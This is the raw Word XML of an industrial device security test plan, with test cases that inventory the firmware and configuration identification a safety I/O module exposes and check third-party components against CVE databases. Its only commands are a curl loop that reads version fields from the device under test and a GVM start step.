      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5906">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ004-01 -  Identification-Surface Inventory (SW + Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F0F90" w14:textId="77777777" w:rsidR="00890F42" w:rsidRPr="006D5B99" w:rsidRDefault="00890F42" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C17C174" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 1 - Abstract Test Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47C138" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F50667" w14:textId="77777777" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50464487" w14:textId="3D03012B" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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RQ-004 </w:t>
            </w:r>
            <w:r w:rsidR="00B96CE6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 </w:t>
            </w:r>
            <w:r w:rsidR="00B96CE6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D (software) </w:t>
            </w:r>
            <w:r w:rsidR="00B96CE6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B (data via configuration signature)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125C217E" w14:textId="6945F88C" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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3C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BE7CA50" w14:textId="58862BEF" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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3C3C88" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7092B50D" w14:textId="77777777" w:rsidR="009C0EC2"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identification set the device exposes; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E97B2D" w14:textId="77777777" w:rsidR="009808AA"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it identifies safety software (firmware/bootloader/stack versions) and safety data (the configuration signature); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126158E8" w14:textId="2BC1FF0A" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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diff against the expected EHSR-critical software</w:t>
            </w:r>
            <w:r w:rsidR="009808AA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="009808AA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">data set to reveal the </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>completeness gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3B938C"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device software version fields via the identification interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E982FB5"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identity and configuration-signature records via the fieldbus acyclic identity records.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6B2864" w14:textId="77777777" w:rsidR="00B10E5C"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the firmware and communication-stack version fields.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1272B803" w14:textId="0D8810B7" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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w:t>
            </w:r>
            <w:r w:rsidR="0059489A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>mpi</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>le the inventory and compare against the expected set, including third-party components.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C06C9" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003C06C9" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC92C57" w14:textId="77777777" w:rsidR="00B10E5C"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the device returns top-level software identification and a data-identification signature. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E6149F" w14:textId="732B3625" w:rsidR="003C06C9" w:rsidRPr="006D5B99"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software bill of materials of third-party components is present and no explicit safety-critical-data classification is exposed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D8FF25F" w14:textId="77777777" w:rsidR="003C06C9" w:rsidRPr="006D5B99" w:rsidRDefault="003C06C9" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CD7AEA" w14:textId="77777777" w:rsidR="003C06C9" w:rsidRPr="006D5B99" w:rsidRDefault="003C06C9" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485129B0" w14:textId="77777777" w:rsidR="003C06C9" w:rsidRPr="006D5B99" w:rsidRDefault="003C06C9" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC4A19"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BF488B5"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6D614CD8" w14:textId="4C4794E3" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00772B7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TC-RQ004-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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3A9CEBC" w14:textId="56B880A0" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00484F9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TIA, OWASP FSTM Stage 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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06DB7EFE" w14:textId="7361A044" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00772B7F" w:rsidP="008C3E3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OWASP FSTM Stage 1 checklist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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9CB6600"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for p in deviceinfo/hwversion deviceinfo/hwrevision deviceinfo/swrevision \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B14F6E7"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deviceinfo/swinfo/cpubootloaderversion deviceinfo/swinfo/scpuversion \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E50BAC9"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deviceinfo/swinfo/scpubootloaderversion firmware/version fieldbussetup/fieldbusfirmware; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1A73B5"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en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>echo "== $p =="</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D5B38F"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pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">  curl -s http://$SRIO/$p/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58562F64" w14:textId="77777777" w:rsidR="00DB5860"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pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C543E7" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00DB5860"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done | tee cm_rq004-01_inventory.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C39BF5" w14:textId="77777777" w:rsidR="0059489A" w:rsidRPr="006D5B99"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7AE8C647" w14:textId="77777777" w:rsidR="0059489A" w:rsidRPr="006D5B99" w:rsidRDefault="0059489A" w:rsidP="00DB5860">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2951B4DD" w14:textId="694618DD" w:rsidR="003838B2" w:rsidRPr="006D5B99" w:rsidRDefault="00C052CE" w:rsidP="00DB5860">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00827CEB" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t>TIA: I</w:t>
            </w:r>
            <w:r w:rsidR="0059489A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t>&amp;M0, I&amp;M5, I&amp;M4 for data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6061C3BF" w14:textId="7D65033D" w:rsidR="003838B2" w:rsidRPr="006D5B99" w:rsidRDefault="003838B2" w:rsidP="00DB5860">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="da-DK"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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AF8E59F" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="004954E2" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C35979" w14:textId="77777777" w:rsidR="007C2B4B" w:rsidRPr="006D5B99"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(partial-conformance baseline): top-level SW identification + </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I&amp;M4 data signature present;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E3FCE6" w14:textId="063F092A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="006D0CC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Evidence: cm_rq004-01_inventory.txt, TIA I&amp;M screenshots, inventory diff table. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47CBE2FF" w14:textId="446CABC0" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E368B66" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653ECBB1" w14:textId="77777777" w:rsidR="009553FB" w:rsidRPr="006D5B99" w:rsidRDefault="00255D8C" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ004-02 - </w:t>
      </w:r>
      <w:r w:rsidR="009553FB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software-Bill-of-Materials Completeness &amp; Third-Party Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="009553FB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310E0501" w14:textId="449A0F03" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A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6C494C52"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4E7BAEC3" w14:textId="0011D92B" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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RQ-004 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8/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C76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Target </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F18C96" w14:textId="635643F2" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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1D1329B0"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6D5B99"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1BB4D307" w14:textId="3D378883" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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2B14403F" w14:textId="08F75940"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TC-</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>004-</w:t>
            </w:r>
            <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, list all device-exposed version strings.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F1869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documentation, list the known constituent third-party components.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C5BA5B" w14:textId="77777777" w:rsidR="006C6557"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derive each component's version from any exposed interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="033C2663" w14:textId="2A8B0AEE" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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derivable versions, correlate against a vulnerability database; record the remainder as un-inventoried.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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E1F2126" w14:textId="3ACF6499" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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third-party components are not individually exposed and no bill of materials exists </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the completeness gap; documented as a CR 7.8 shortfall requiring a machine-readable SBOM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B1E94F" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141CA667" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39507216"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47D03091"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598A111D" w14:textId="69E3A2A1" w:rsidR="009305A1" w:rsidRPr="006D5B99"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TC-RQ004-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E4E0E" w:rsidRPr="006D5B99"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7E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78B0CD65" w14:textId="3E702E52" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="005433D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optionally supplemented by a CVE cross-check via Kali/GVM (CM-008). </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E4E0E" w:rsidRPr="006D5B99"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7E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49371565" w14:textId="6B92F90E" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">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GVM/OpenVAS (CM-008, optional </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the community feed may need to be imported offline, see test-environment note, section 2), otherwise manual version-to-CVE lookup (NVD).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E4E0E" w:rsidRPr="006D5B99"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7E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF40D5D"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From references [6]-[14] (209_SRIO_CompSpec_Module_Com), compile the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB1A251"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third-party component versions: µC/OS-II, PROFIsafe stack V2.6 MU1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CACEF1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STM32F7 STL Rev.7, netX90 PROFINET stack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515D3440"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For each component/version, check for a public CVE reference (NVD /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAA4E7E"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vendor advisories).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43923068"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If GVM is available:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A57F0B4"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gvm-start</w:t>
            </w:r>
          </w:p>
